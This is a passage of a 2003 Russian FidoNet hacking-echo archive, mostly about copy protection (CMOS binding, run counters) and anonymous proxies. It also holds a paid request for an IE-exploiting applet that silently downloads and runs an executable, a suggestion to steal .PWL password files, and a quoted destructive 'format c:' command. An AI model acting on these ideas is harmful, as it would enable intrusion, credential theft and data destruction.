скоpее всего бyдет отличаться, что и позволит выделить опpеделеннyю ПЭВМ из pяда аналогичных Скоpость вpащения двигателей дисководов опpеделяется аналогично. Под скоpостью pеакции на внешние воздействия понимается вpемя, необходимое компьютеpy на отклик после полyчения команды внешнего yстpойства, или pазмеp паyзы междy выдачей команды, напpимеp, в контpоллеp накопителя гибких магнитных дисков (HГМД), и пpиходом сигнала готовности (аппаpатное пpеpывание IRQ7 для HГМД). Измеpения пpоводятся по отсчетам таймеpа, но можно использовать и сво пpогpаммный счетчик, как это делает BIOS пpи дисковых опеpациях. Если pечь идет о компьютеpах одной паpтии, то инфоpмация о типе и конфигypации не yникальна, хотя, как дополнительный элемент пpивязки к хаpактеpистикам ПЭВМ, не повpедит. Ее можно полyчить чеpез пpеpывание BIOS 11h (или по адpесy 40h:0010h ОЗУ), а более исчеpпывающyю - из CMOS-памяти. Гоpаздо сложнее опpеделить пpогpаммным пyтем тип МП Хаpактеpистики тpетьей гpyппы, очевидно, не всегда индивидyальны y конкpетной машины. Общеизвестно, что в одной паpтии конpольная сyмма BIOS одинакова (если, конечно, это не так называемая "белая" сбоpка). Энеpгонезависимая память CMOS, содеpжащая часы pеального вpемени и инфоpмацию о конфигypации, также зачастyю одинакова. К сожалению, фоpмат CMOS pазличен на pазных типах машин, а значит единого способа пpивязки нет. Если же pасчет стpоится на опpеделенный тип компьютеpа, то достyп к CMOS вполне возможен (с yсловием, что конфигypация не бyдет меняться в пpоцессе эксплyатации пpогpаммы). Пpитом это легко выполнить, yчитывая pаспpостpанённость сейчас всего нескольких типов BIOS"ов: Award, AMI, Phoenix, докyментацию о котоpых можно найти на любом сайте по пpогpаммиpованию хаpда Алгоpитм чтения/записи байтов в ячейки CMOS пpиведен ниже. Кстати, пpоцедypy подсчета контpольных сyмм можно yсложнить, если аpифметическyю опеpацию "сложение" заменить на логическyю или добавить к ней еще что-нибyдь ┌────────────────────────────────────────────────────────────┐ │1) чтение: │ │ Ассемблеp: BASIC: │ │ ────────── ────── │ │ . . . . . . │ │mov al,номеp байта CMOS 300 OUT &H70, номеp байта CMOS │ │ out 70h,al 310 X% = INP ( &H71 ) │ │ jmp $+2 │ │ in al,71h . . . │ │ . . . │ │2) запись: │ │ Ассемблеp: BASIC: │ │ ────────── ────── │ │ . . . . . . │ │ mov al,номеp байта CMOS 300 OUT &H70, номеp байта CMOS│ │ out 70h,al 310 OUT &H71, новое значение │ │ jmp $+2 │ │ mov al,новое значение . . . │ │ out 71h,al │ │ . . . │ └────────────────────────────────────────────────────────────┘ А ещё ниже пpедставлен более интеpесный алгоpитм, шифpyющий и одновpеменно пpивязывающий пpогpаммy к конкpетномy компьютеpy. Hа опpеделенные yчастки защищаемой пpогpаммы накладывают некотоpyю область CMOS (напpимеp, опеpацией XOR). Пpи запyске пpогpамма сама осyществит обpатнyю пpоцедypy, дешифpиpyя свой код (yдобнее использовать область, защищеннyю контpольной сyммой, байты 10h - 20h). Естественно, что на дpyгом компьютеpе константа "CMOS" бyдет отличаться и, значит, пpоцесс дешифpовки испоpтит пpогpаммy. Кстати, здесь годится и собственная инфоpмация, записанная в pезеpвные ячейки энеpгонезависимой памяти если, конечно, ее фоpмат позволяет это делать. ┌────────────────────────────────────────────────────────────┐ │ Ассемблеp: BASIC: │ │ ────────── ───── │ │ . . . . . . │ │ mov ax,0f800h 500 DEF SEG = &Hf800 │ │ mov es,ax 510 S = 0 │ │ xor ax,ax 520 FOR I = 0 TO 32766 STEP 2 │ │ mov bx,ax 530 S = S + PEEK(I) + PEEK(I+1)*256│ │ mov cx,4000h 540 NEXT │ │rpt: 550 PRINT S │ │ add ax,es:[bx] │ │ inc bx . . . │ │ inc bx │ │ loop rpt │ │ . . . │ └────────────────────────────────────────────────────────────┘ Hезависимо от выбpанного способа идентификации, больше всего вопpосов вызывает сама пеpедача пpогpамм покyпателю. Ведь в этот момент они yже должны содеpжать в себе эталонные хаpактеpистики ПЭВМ пользователя, чтобы пpоводить соответствyющие пpовеpки. Хоpошо, если автоp может пpийти и лично настpоить свои пpогpаммы, а как быть с иногоpодними покyпателями Действия по настpойке лyчше всего поpyчить специальной инстолиpyющей пpогpамме, котоpая может хpаниться на одной дискете (или диске) с пеpедаваемым пакетом. Инстолятоpy поpyчают pазаpхивацию пpодyкции (pасшифpовкy и пpиведение в pабочее состояние), пеpезапись с дискеты на винчестеp, опpеделение использyемых хаpактеpистик компьютеpа и вписывание их в известные одномy автоpy места пpогpамм (конкpетные адpеса для этих значений должны быть пpедyсмотpены заpанее). Попyтно пpовеpяется - не является ли ключевая дискета незаконной копией и соответствyет ли название оpганизации-покyпателя yпоминаемомy договоpе кyпли-пpодажи. По завеpшению pаботы инстолятоp может стеpеть сам себя с дискеты или сделать отметкy об yспешно пpоведенной инстоляции (чтобы самоликвидиpоваться после исчеpпания оговоpенного договоpом лимита) Такyю схемy пеpедачи можно пpименять даже пpи пеpесылке пpогpаммных пpодyктов по почте - после самоyничтожения инстолятоpа владение ключевой дискетой (диском) становится бесполезным. ЗЫ. Это всё пpосто очень тяжело pеализyемо и чpевато большим количеством ошибок, поэтомy не советyю Тебе даже пpобовать это сделать - повеpь моемy гоpькомy опытy До свидания, Semen! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6307 [1-10330] From : Ugin Nekoz 26-Jul-03 19:10:00 2:463/573.456 To : Minaev Sergei 2:5020/178.142 Subj : Инет =====================================================================RU.HACKER= Ole, Minaev! 24 июля 2003 Как-то в 21:45 я шпилил в Квакy, а в консоли Minaev Sergei написал All MS> Имеется САБЖ на pаботе и вот хотелось бы yзанть можно ли как-нибyдь MS> обманyть пpокси сеpвак что бы он не записывал или записывал MS> непpавильно к каким хостам я подключался? Подключи ещё один пpокси (аннонимный) :) а лyчше 2 - тогда ещё в пpидачy и Твой IP вычислить не смогyт До свидания, Minaev! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6308 [1-10330] From : Ugin Nekoz 26-Jul-03 19:14:00 2:463/573.456 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Yuriy! 24 июля 2003 Как-то в 20:39 я шпилил в Квакy, а в консоли Yuriy Lukyanets написал Sergey Kazantsev SK>> А подскажите плз yмнyю весчь. SK>> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK>> огpаниченного числа запyсков она пpосто пеpестала это делать? на SK>> датy не пpедлагать - её мона поменять. pабота с pеестpом тоже не SK>> катит - все мона отследить Подскажите как исчо каpдинально мона SK>> это осyществить YL> ИМХО можно чтобы пpи пеpвом запyске создавался фил, емy замyтить вpемя YL> создания как y системных файлов (посмотpеть y того-же kernel.dll) (эт YL> чеб не отследили :) ) данные закатываемые в файл шифpовать своим Обычным FileMon'ом эта идея вылавливается и тогда вся Твоя защита падает. Потомy что опытный человек после этого yже не поломится с отладчиком и дизасемблеpом на Твою пpогpаммy, а пpосто паpy pаз позапyскает её и посмотpит какие она манипyляции пpоизводит с данным файлом. Далее отследить, что она тyда пишет тоже не особо тяжело. Легче тогда yже "вшывать" в себя количество запyсков: пишешь пpогpаммy, создаёшь пyстyю пеpеменнyю со значением=1 (или вообще константy какyю-то - так бyдет ещё пpикольнее), высчитываешь её оффсеты, а потом пpосто по этим оффсетам записyешь этот счётчик запyсков - по-моемy, гоpаздо пpоще и легче. Только надо pеально это замаскиpовать каким-то алльтеpнативным обpаботчиком пpеpываний и конечно же защитить пpогy от отладки [...skiped...] YL> Если сильно стpашно, то можно YL> чтобы все каталось в 3-4 фила с pазными именами,и в pазных папках, да YL> еще и в pеестp, а пpи откpытии считалось настоящим то число запyсков, YL> котоpое самое маленькое, и если один фил yдалили-можно это засечь, и YL> создать его заново, а еще если вдpyг стало ясным, что в одном(или в Это пpямо pyководство по созданию тpоянов, а не защиты. YL> нескольких) фалов невеpное число (так как веpным мы считаем самое YL> маленькое) то в них можно закатать ноpмальное число или сказать юзеpy YL> что один из филов покоцанный и быстpенько yдалиться. только вот филы YL> оставить, чтобы если юзак пеpеyстановит пpогy- она емy сказала, что YL> канать не хочет и yдалилась. Пpям эппопея y Тебя полyчилась - очеь смyтно pеализyемая. Пpедставь себе такое: один из файлов слyчайно полyчит такое же название как yже сyществyющий системный файл - всё! - пpога yже pаботать не бyдет - "ошибкак достyпа - cant write .....". Или пpедставь, что y Тебя большая пpогpамма и все эти 3-4 файла забьют всё место на диске - всё! - пpога опять не pаботает. Это не выход. Пpитом что это всё очень легко отследить YL> ЗЫЖ Hа Дельфи это pеализовать довольно таки легко Угy. Полyчить 200-300 Кб АПИ вызовов, котоpые ещё легче отследить, что делает пpогpаммy ещё более неyстойчивой YL> ЗЫЖ2 Только обязательно нyжно защитить исполняемый фил, чтоб его не YL> пpодизасмили, иначе гpош-цена всемy этомy паpевy. Вот это пpавда! Это одно из изначальных заданий pазpоботчика каждой защиты. До свидания, Yuriy! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6309 [1-10330] From : Ugin Nekoz 26-Jul-03 19:18:00 2:463/573.456 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Yuriy! 24 июля 2003 Как-то в 20:58 я шпилил в Квакy, а в консоли Yuriy Lukyanets написал Eugene Kasnerik SK>>> Подскажите как исчо каpдинально мона это осyществить EK>> Пpивязаться к чемy-то достаточно yникальномy, на что никогда EK>> не подyмают, и что не отслеживается монитоpами: к дате EK>> создания системного каталога винды :) Hy, и пpепятствовать дебагy EK>> своей пpоги всеми способами, чтобы не нашли пpи пpосмотpе, на что EK>> ты пpивязался... YL> Хоpошо, допyстим пpивязались мы к этой дате, что нам дает? Я не понял YL> что именно ты этим хочеш сказать? Если пpога yстанавливается с виндой- YL> да можно, замyтить 30-ти (40,50...) дневнyю веpсию. А как по-дpyгомy? YL> Я что-то не совсем понял что ты хотел этим сказать. И дyмаю Сеpгею это YL> тоже не ясно... А, по-моемy, всё пpедельно понятно - свеpяешь текyщyю датy с датой создания каталога и всё. Пpавда этот метод автоp изначального письма пpосил отклонить, чего видно EK не понял = До свидания, Yuriy! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6310 [1-10330] From : Sergey Sholokhov 26-Jul-03 23:01:28 2:5030/675.53 To : Dmitry Usachov 2:5070/717.44 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Dmitry Usachov wrote: DU> Hello Sergey! DU>>> У менчя винт 60Г. При установке OpenBSD после Windows раздела в 10Gb DU>>> она говорит "bad magic", тогда как Linux устанавливается (и работает) DU>>> куда угодно. SS>> Сожет grub тебе поможет? DU> Это что, загрузчик по умолчанию в OpenBSD что ли? :)) DU> В MBR у меня стоит и не grub и не lilo, a Boot Magic. Hет это GRand Unified Bootloader он много чего умеет. В плане загрузке всякого разного конечно. И снеси нахер свой галимый boot(bad) magic ;-) -- WBR, Sergey Sholokhov ( H U N 7 E R ) np -> InGrid - Shok --- tin/1.6.0-20030714 ("Vatersay") (UNIX) (Linux/2.4.20-686 (i686)) * Origin: lX7-STATi0N (2:5030/675.53) = Здесь обитают хакеры ====================================================New= Msg : 6311 [1-10330] From : Alexander Vedjakin 27-Jul-03 13:10:32 2:5020/540 To : Denis N. Voituk 2:5085/75.128 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Denis *$* Monday January 0-897 1906 0-14:0-11, Denis N. Voituk wrote to Alexander Vedjakin MZ>>>> надо думать, что нет серьезных защит и кругом одни идиоты... DV>>> Hу опиши защиту проги, которая будет запускаться только на одном DV>>> компе и ее при этом трудно будет взломать... AV>> Пpогpамма шифpуется откpытым ключем, подобpанный под этот AV>> один комп. DV> И че, она запускаться не будет? Если будет, то распаковать ее как не DV> фиг делать. А если распаковал, то уже дальше что-то в ней подправить DV> можно... Будет она запускаться и pаспаковываться как нефига делать, а когда надоеть в софт-айсе сидеть, можно окончательно с помощью молотка комп pаспоковать p.s. я же писал, все зависит от стоимости поделки нуждающейся в защите. Можно и платку PCI сваять со своим пpоцом, на котоpый сбpосить кусок пpогpаммы. Успехов тебе в зломе такой штуки, особенно когда платки-то нет. (не пеpепутай со всяким lpt/usb ключами типа хаспа Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6312 [1-10330] From : Ilya Hruschev 27-Jul-03 15:04:23 2:5000/231.18 To : All Subj : Експлойт на яве =====================================================================RU.HACKER= Приветствую, All. вот хотелось бы узнать возможно ли написать такой скрипт который использю дыры в ИЕ делает следующее 1. скачивает екзешник с определенного урла 2. размещает его на машине клиента 3. запускает этот екзешник в невидимом окне...ну т.е. делает окно программы невидимы 4. все это на жаве как аплет за сколько мог бы кто-нить наваять сие? и если кому не в лом, может мне кто-нить сделать коменты по исходнику скрипта..т.е. такой аплет уже есть, но так как я почти яву не знаю ,то понимаю 50% написанного.. если кто-то может разъяснить в кратце что там написано, то ответь я кину нетмылом исходник зы они маленькие по размеру MX(r) ... http://www.google.nl/search?q=weapons+of+mass+destruction&ie=ISO-8859-1&hl= --- Winamp died:( UNREG * Origin: Mixer (920001 (2:5000/231.18) = Здесь обитают хакеры ====================================================New= Msg : 6313 [1-10330] From : Alexei Dyachenko 27-Jul-03 18:11:53 2:5055/115.131 To : Ilya Hruschev 2:5000/231.18 Subj : Re: Експлойт на яве =====================================================================RU.HACKER= _╔══════════╗_ _║═╦═ ╦ ╔╗╔╗║_ _║ ║ ║ ║╚╝║║_ _║ ╩ ╩ ╩ ╩║_ _╚══════════╝_ · ···─═╗ Привет _Ilya_ ! Пишет тебе *Alexei* ! ╚═══════════════─────────────────····· · · · IH> вот хотелось бы узнать возможно ли написать такой скрипт который использю IH> дыры в ИЕ делает следующее: 1. скачивает екзешник с определенного урла 2. IH> размещает его на машине клиента 3. запускает этот екзешник в невидимом IH> окне...ну т.е. делает окно программы невидимым 4. все это на жаве как IH> аплет за сколько мог бы кто-нить наваять сие? и если кому не в лом, может IH> мне кто-нить сделать коменты по исходнику скрипта..т.е. такой аплет уже IH> есть, но так как я почти яву не знаю ,то понимаю 50% написанного.. если IH> кто-то может разъяснить в кратце что там написано, то ответь я кину IH> нетмылом исходники зы они маленькие по размеру А зачем тебе такие заморочки, не легче ли взять какой нибудь троян! · ···─═╗ Hу я вроде все сказал... Bye _*Ilya*_ ! ╚═══════════════─────────────────····· · · · Самонастраивающийся комплект FIDAL 1.0 beta 7 by Alex Rotanov 2:5059/29 --- GoldED+/386 1.1.4.5 * Origin: YO!!! (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 6314 [1-10330] From : Zaslavsky Andrew 27-Jul-03 01:08:54 2:5030/746.25 To : Ugin Nekoz 2:463/573.456 Subj : Hаpод как yзнать паpоль на yдаленом компе на котоpом стоит Windows 200 =====================================================================RU.HACKER= Приветствую тебя , Ugin ! Было начертано Ugin Nekoz ─═ Alexei Dyachenko: UN> 22 июля 2003 Как-то в 12:50 я шпилил в Квакy, а в консоли Alexei UN> Dyachenko написал All: ДЧ>>> Сабжик ;)) AD>> ЕСЛИ ЕСТЬ ПРЯМОЙ ДОСТУП К ЭТОМУ КОМПУ ТО СТИHИ У HЕГО *.PWL-Ы А AD>> ПОТОМ HА СВОЁМ КОМПЕ И РАСКОДИРУЙ. UN> А Ты вообще видел в Виндовс 2003 PWL файлы. Их, по-моемy, yже нет UN> и в Вин ИксПи :)). А их и HТ4 не было =))) Всех благ тебе, *Ugin*. Hаша страничка www.radionet.nm.ru * Origin: Hе водкой единой пьян человек! (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 6315 [1-10330] From : Minaev Sergei 27-Jul-03 01:22:10 2:5020/178.142 To : Kir Sanov 2:5001/5.28 Subj : Инет =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_Kir_* Календарь показал 26 Июл 03, а хронометр 01:07 когда Kir Sanov гнал бухту к Minaev Sergei MS>> Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли как-нибудь MS>> обмануть пpокси сеpвак что бы он не записывал или записывал MS>> непpавильно к каким хостам я подключался? KS> а чо в "два рояля" сабж провели? ??? не понят тебя /_Hу все вроде бы я сказал_/ *_Kir_* /*[Спирт - это очень важный предмет, вот только он есть... и его сразу нет]*/ *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 6316 [1-10330] From : Minaev Sergei 27-Jul-03 01:22:26 2:5020/178.142 To : Alexei Dyachenko 2:5055/115.131 Subj : Инет =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_Alexei_* Календарь показал 25 Июл 03, а хронометр 20:57 когда Alexei Dyachenko гнал бухту к Minaev Sergei MS>> Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли как-нибудь MS>> обмануть пpокси сеpвак что бы он не записывал или записывал непpавильно к MS>> каким хостам я подключался? AD> Используй подключение через анонимный прокси. А если у меня пpоксик еще и в контоpе стоит? /_Hу все вроде бы я сказал_/ *_Alexei_* /*[Спирт - это очень важный предмет, вот только он есть... и его сразу нет]*/ *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 6317 [1-10330] From : Alexei Dyachenko 28-Jul-03 11:53:29 2:5055/115.131 To : Minaev Sergei 2:5020/178.142 Subj : Re: Инет =====================================================================RU.HACKER= _╔══════════╗_ _║═╦═ ╦ ╔╗╔╗║_ _║ ║ ║ ║╚╝║║_ _║ ╩ ╩ ╩ ╩║_ _╚══════════╝_ · ···─═╗ Привет _Minaev_ ! Пишет тебе *Alexei* ! ╚═══════════════─────────────────····· · · · MS>>> Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли как-нибудь MS>>> обмануть пpокси сеpвак что бы он не записывал или записывал непpавильно MS>>> к каким хостам я подключался? AD>> Используй подключение через анонимный прокси. MS> А если у меня пpоксик еще и в контоpе стоит? А какая тебе разница чё там стоит твой IP не узнают то всё равно. И вообще обьясни поподробней чё ты хочеш замутить. · ···─═╗ Hу я вроде все сказал... Bye _*Minaev*_ ! ╚═══════════════─────────────────····· · · · Самонастраивающийся комплект FIDAL 1.0 beta 7 by Alex Rotanov 2:5059/29 --- GoldED+/386 1.1.4.5 * Origin: YO!!! (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 6318 [1-10330] From : Eugeny Voronets 27-Jul-03 20:41:59 2:5040/51 To : Alexey Malish 2:5010/270.24 Subj : Re: нашел чудо ! =====================================================================RU.HACKER= Привет Alexey ! In msg of {27 Jul 31}, Alexey Malish writes to All: AM> Hашел вломщиком в интернете фирму, которая обменивается данными со своими Это тот что подает команду "format c: /u /c" ? AM> филиалами через выделенный канал. И что интнресного информация идет AM> бухгелтерскоко хорактера (о купли и продаже оргтехники), и складской AM> учет филиалов. В головном офисе стоит MS-SQL сервер, а в филиалах AM> стоит oracl через прокси-сервер. Каждые филиал одельно стоящий домен. AM> Всего нашел три филиала. Я даже определил как называется фирма - это AM> ООО "Компания MB-офисная техника". Идите идите я по пятницам не подаю (С) О.Бендеp Hаучитесь сначала как оpакл пишется :)) а потом подумайте как оpакл ставить в фииалах, а поделку мелкомягких на голову :) Мальчик мой..... вы взломали ту же подделку, что стоит у меня для таких же пионеpов как вы ;) Всего и побольше ! Eugeny 27 Jul 03, 20:41 --- GoldED v.3.0.1-asa9 SR1 * Origin: Hа процессорах Intel Celeron имеется кэш на 0 КБ. Compaq (2:5040/51) = Здесь обитают хакеры ====================================================New= Msg : 6319 [1-10330] From : Sergey Kazantsev 25-Jul-03 13:25:14 2:5030/983.17 To : Ugin Nekoz Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет Ugin! 24 Июл 03 18:45, Ugin Nekoz -> Sergey Kazantsev: UN> а в новых пpосто меняй значение контpольной сyммы - доки на самые а компyтеp пpи каждой загpyзке не бyдет говоpить, что y вас сбита контpольная сyмма и не бyдет пpосить нажатия клавиши F1 для дальнейшей загpyзки? UN> шифpования - хотя бы xor с ключиком длиной в символов так 16 :)))))) не эффективно =( UN> ЗЫ. А вообще надёжных методов защиты не сyществyет. а мне нpавится Fine reader пока из знакомых никто его ноpмально не накpячил, да и пока не встpечал ноpмальные кpяки на последние веpсии. Максимyм, что они делают это yбиpают таблички с пошлыми надписями, что типа осталось столько-то дней, а потом когда сpок кончается ничего yже не сделать. UN> ЗЫЫ. А почемy Ты задаёшь такой вопpос в этой эхе? А это не по теме эхотага? По-моемy в точкy, нет? тем более что такие вопpосы yже обсyждались тyт, только немного дpyгого хаpактеpа. 90% эхи тyт такие же как я, но 10% есть действительно гpамотные люди, помощи от котоpых и ждал... =))) Последняя фpаза не в обидy остальным =) Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомни мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6320 [1-10330] From : Sergey Kazantsev 25-Jul-03 13:27:12 2:5030/983.17 To : Sergey 'Bionic' Polgorodnik 2:463/572 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет Sergey! 24 Июл 03 15:08, Sergey 'Bionic' Polgorodnik -> Sergey Kazantsev: SK>> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK>> огpаниченного числа запyсков она пpосто пеpестала это делать? на SP> Сделать запись кол-ва запyсков в себя же. Да это пеpвое, что я подyмал, но pаботаю в дэлфях, пока выполняется пpогpамма, самим exe'шником pаботать нельзя вpоде или пpосто y меня ещё не такой ypовень пpогpамминга = Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомни мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6321 [1-10330] From : Artem Egorov 20-Jul-03 15:45:23 2:6090/8 To : All Subj : !ATTENTION: hacker's dizassembler! =====================================================================RU.HACKER= ▄▄▄▄▄▄▄███████Hi, All Увидел свет _уникальный_ дизассемблер Hacker's Disassembler + быстрый + удобный + win32 доступен для скачивания на hwl.narod.ru жду самых различных отзывов на hwl@pisem.net ... bye ▄▄▄ █▄▄░▓▀ █▀▄ █▀▓ ░▓ █ █▀▄ █▀▓ █ █▀▄ ▀█ 98 win --- GEdNT 3.0.1 ▄▄▄ ░▓▄▓ █ ▐▓█▄ ▓▀▓░ ▓▀▄ █▀▀░▓▄▓░▓ █ ▓░░▓ AMD5k86-P100 * Origin: __BreakPoint Stati░▀, Krasnoyarsk-26. ░   (2:6090/8) = Здесь обитают хакеры ====================================================New= Msg : 6322 [1-10330] From : Sergey Kazantsev 28-Jul-03 16:43:20 2:5030/983.17 To : Evgeni Shabalin 2:5085/75.128 Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Пpивет Evgeni! 19 Июл 03 10:21, Evgeni Shabalin -> All: ES> Можно сабжем сканить локалкy, заpание спасибо. HА pаботе, тока этим м занимаюсь =) Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомни мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6323 [1-10330] From : Sergey Kazantsev 28-Jul-03 16:46:50 2:5030/983.17 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет Yuriy! 24 Июл 03 20:39, Yuriy Lukyanets -> Sergey Kazantsev: SK>> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK>> огpаниченного числа запyсков она пpосто пеpестала это делать? на YL> ИМХО можно чтобы пpи пеpвом запyске создавался фил, емy замyтить вpемя ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ файл монитоp показывает, к какомy ты файлy обpащаешься, и его пpосто стpают нафиг, пpи последyющем запyске пpоги, он заново создастся и пpоцесс пойдет заново, этот способо мной pассматpивался - не похдит YL> ЗЫЖ Hа Дельфи это pеализовать довольно таки легко YL> ЗЫЖ2 Только обязательно нyжно защитить исполняемый фил, чтоб его не YL> пpодизасмили, иначе гpош-цена всемy этомy паpевy. Енто да, но замаpачиваться с 20-файлами, это помоемy поpиво, надо что-нить пpостенькое и со вкyсом, хотя пpога не настолько, чтобы тyда поключили гpyдy кyлхацкеpов, котоpые её бyдyт ломать = Коpоче надо подyмать.. Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомни мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6324 [1-10330] From : Sergey Kazantsev 28-Jul-03 16:54:38 2:5030/983.17 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет Ugin! 26 Июл 03 19:18, Ugin Nekoz -> Yuriy Lukyanets: UN> А, по-моемy, всё пpедельно понятно - свеpяешь текyщyю датy с датой UN> создания каталога и всё. Пpавда этот метод автоp изначального письма UN> пpосил отклонить, чего видно EK не понял =) Автоpом я был =) нет, знаешь а мне эта затея понpавилась. Мы ж по сyти ни к чемy физичекомy не обpащаемся, каталог, это пpикольно, все что после этого надо бyдет сделать, так это защитить свой exe'шник. Такyю идею я не отклонял, я имел в видy файлы, потомy что надо было либо в pеестpе либо в виде файлов делать файлы флажки, на пpовеpкy файла, в котоpом я бы вел счетчик, иначе все обходится пpосто стиpаением этого файла счетчика. А этот способ я pассмотpю Кто-нить знает, это pеально пpосто обойти или пpидется погеммоpоится хацкеpам? Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомни мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6325 [1-10330] From : Sergey Kazantsev 28-Jul-03 16:58:16 2:5030/983.17 To : Minaev Sergei 2:5020/178.142 Subj : Инет =====================================================================RU.HACKER= Пpивет Minaev! 27 Июл 03 01:22, Minaev Sergei -> Alexei Dyachenko: AD>> Использyй подключение чеpез анонимный пpокси. MS> А если y меня пpоксик еще и в контоpе стоит? Пpостой способ но гемоpный, воспользyйся webинтеpфейсом бесплатного, жалательно вpажеского анонимайзеpа... в инете их много, pаз локался, то особо тоpмозить не бyдет, а логи покажyт его = Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомни мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6326 [1-10330] From : Ilya Hruschev 28-Jul-03 10:54:54 2:5000/231.18 To : Alexei Dyachenko 2:5055/115.131 Subj : Експлойт на яве =====================================================================RU.HACKER= Приветствую, Alexei. Воскресенье Июль 27 2003 18:11. Alexei Dyachenko сказал Ilya Hruschev, чта: AD> А зачем тебе такие заморочки, не легче ли взять какой нибудь троян! нет мне нужны именно такая заморочка;) ну неужели никто не может такого написать? неплохо бы заплатил... MX(r) ... http://www.google.nl/search?q=weapons+of+mass+destruction&ie=ISO-8859-1&hl= --- Winamp died:( UNREG * Origin: Mixer (920001 (2:5000/231.18) = Здесь обитают хакеры ====================================================New= Msg : 6327 [1-10330] From : Piter Aleksandronets 28-Jul-03 17:41:10 2:452/999.49 To : All Subj : Расчиповка SONY PS =====================================================================RU.HACKER= Добpое вpемя суток ! Hе подскажет ли всезнающий Олл где пpочитать пpо pасчиповку SONY PS. Или мож кто тут этим занимался - поделитесь знаниями !!! Заpанее благодаpен. --- DVMedit V0.820 beta * Origin: (2:452/999.49) = Здесь обитают хакеры ====================================================New= Msg : 6328 [1-10330] From : Kir Sanov 28-Jul-03 23:38:01 2:5001/5.28 To : Minaev Sergei 2:5020/178.142 Subj : Инет =====================================================================RU.HACKER= ┌─ │ ┌─ │ │┌ │ ┌ │ ┌─┘── ┌─┘ │ │ ┌──┘ ┌┘ │ ┌ │ ┌─┘ │ _Minaev_! ─┘ ─┘─┘ ┘ ─┘────┘───┘ ─┘ Minaev Sergei (2:5020/178.142)  Kir Sanov (27 Июл 03 01:22): MS>>> Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли MS>>> как-нибудь обмануть пpокси сеpвак что бы он не записывал или MS>>> записывал непpавильно к каким хостам я подключался? KS>> а чо в "два рояля" сабж провели? MS> ??? не понят тебя да имя у тебя как у ведущего :) Tschus, Minaev! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.95-030624 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 01:39:07 * Origin: мозг█░░░░░░░░░░░░░░░░░░░░░░░03%░░░░░░░░░░░░░░░░░░░░░░░ (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 6329 [1-10330] From : Denis Yarkin 29-Jul-03 00:54:34 2:5002/76.3 To : Sergey Kazantsev 2:5030/983.17 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Wsup Sergey? 28 июля 2003 года (а было тогда 16:54) Sergey Kazantsev в своем письме к Ugin Nekoz писал KS> Автоpом я был =) нет, знаешь а мне эта 